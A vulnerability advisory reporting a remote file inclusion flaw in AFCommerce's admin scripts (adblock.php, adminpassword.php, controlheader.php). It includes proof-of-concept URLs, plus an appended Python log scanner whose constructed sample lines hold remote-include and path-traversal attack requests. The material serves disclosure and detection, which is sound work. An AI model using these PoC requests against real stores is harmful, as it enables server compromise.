AFCommerce Remote File Inclusion

2013.12.26
Credit: NoGe
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

[o] AFCommerce a.k.a Amazing Flash Commerce <= Remote File Inclusion Vulnerability

    Software : AFCommerce Professional Edition
    Version  : n/a
    Vendor   : http://www.afcommerce.com/
    Author   : NoGe
    Contact  : noge[dot]code[at]gmail[dot]com
    Desc     : AFCommerce is a full and complete online store with both a store front and
               administration area directly Out-Of-The-Box, which can be easily installed,
               configured, and maintained over a web-based interface. AFCommerce now includes
               our Ecommerce Website Building Software integrated with our free shopping cart.
               This allows you to create an unlimited number of custom web pages, customize
               font / colors of all your pages, as well as the structural layout of your website.

=============================================================================================================

[o] Vuln

    adblock.php
    adminpassword.php
    controlheader.php

    include_once ($rootpathtocart . "/admin/customadminfooter.php");
    include_once ($rootpathtocart . "/mods/adminfiles/adminpassword.php");
    include_once ($rootpathtocart . "/mods/adminfiles/controlheader.php");

=============================================================================================================

[o] Poc

    http://localhost/afcontrol/adblock.php?rootpathtocart=[RFI]
    http://localhost/afcontrol/adminpassword.php?rootpathtocart=[RFI]
    http://localhost/afcontrol/controlheader.php?rootpathtocart=[RFI]

=============================================================================================================

[o] Greetz

    Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory aJe kaka11 matthews
    wishnusakti inc0mp13te martfella pizzyroot Genex H312Y noname tukulesto }^-^{

=============================================================================================================

[o] December 25 2013 - Papua, Indonesia || Merry Christmas!! Lord Jesus bless you... :)
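Added detection example, not part of NoGe's advisory or of the AFCommerce code base: the PoC shows that rootpathtocart is taken from the request, while the include_once() calls above treat it as a server-side path prefix, so any request that supplies that parameter to adblock.php, adminpassword.php or controlheader.php is abnormal. The Python below scans Apache/Nginx combined-format access logs for such requests and labels the decoded value as a remote URL or PHP stream wrapper, a path traversal, or simply an unexpected parameter. The log lines and IP addresses are constructed for this example, and the afcontrol directory name is assumed from the PoC URLs.

```python
# Added example (not from the advisory or from AFCommerce): flag requests that
# pass rootpathtocart to the admin scripts named in the advisory. The application
# is expected to set $rootpathtocart itself, so the parameter should never appear
# in a request; the value is additionally labelled by how include_once() would
# treat it. Sample log lines at the bottom are constructed.
import re
from urllib.parse import urlsplit, parse_qs

# Scripts listed in the advisory's Vuln section (directory name taken from the PoC URLs).
VULNERABLE_SCRIPTS = {"adblock.php", "adminpassword.php", "controlheader.php"}
PARAM = "rootpathtocart"

# Apache/Nginx "combined" format: client identd user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Anything with a URL scheme prefix: http:, https:, ftp:, php:, data:, ...
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*:')


def classify_value(value):
    """Label a percent-decoded rootpathtocart value."""
    v = value.strip().lower()
    if SCHEME_RE.match(v):
        # A URL or PHP stream wrapper: include_once() would load code from elsewhere.
        return "remote-or-wrapper"
    if ".." in v:
        # Parent-directory components: a local file read outside the web root.
        return "traversal"
    # A plain path is still abnormal, because clients never legitimately send it.
    return "unexpected-parameter"


def scan_line(line):
    """Return a finding for one suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    script = target.path.rsplit("/", 1)[-1].lower()
    if script not in VULNERABLE_SCRIPTS:
        return None
    # parse_qs percent-decodes once, which is what PHP's $_GET would see.
    params = parse_qs(target.query, keep_blank_values=True)
    if PARAM not in params:
        return None
    value = params[PARAM][0]
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "script": script,
        "value": value,
        "kind": classify_value(value),
        "status": int(m.group("status")),
    }


def scan(lines):
    """Scan an iterable of log lines; findings are returned in log order."""
    findings = []
    for line in lines:
        finding = scan_line(line)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample log using documentation IP ranges (not real hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Dec/2013:10:15:01 +0900] "GET /afcontrol/adblock.php?rootpathtocart=http%3A%2F%2F203.0.113.9%2Fx.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [26/Dec/2013:10:15:09 +0900] "GET /afcontrol/controlheader.php?rootpathtocart=..%2F..%2F..%2Fetc HTTP/1.1" 500 221 "-" "curl/7.30.0"',
    '192.0.2.15 - - [26/Dec/2013:10:16:00 +0900] "GET /afcontrol/adblock.php HTTP/1.1" 200 4110 "-" "Mozilla/5.0"',
    '192.0.2.15 - - [26/Dec/2013:10:16:02 +0900] "GET /index.php?rootpathtocart=http://203.0.113.9/ HTTP/1.1" 200 3980 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [26/Dec/2013:10:17:31 +0900] "GET /afcontrol/adminpassword.php?rootpathtocart=%2Fvar%2Fwww HTTP/1.1" 200 512 "-" "curl/7.30.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['script']} {f['kind']}: {f['value']!r}")
```

Only the first, second and fifth sample lines produce findings: the third carries no parameter and the fourth targets a script not named in the advisory. A 200 status on a remote-or-wrapper finding is the case worth triaging first, since it indicates the include did not fail outright.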


Copyright 2018, cxsecurity.com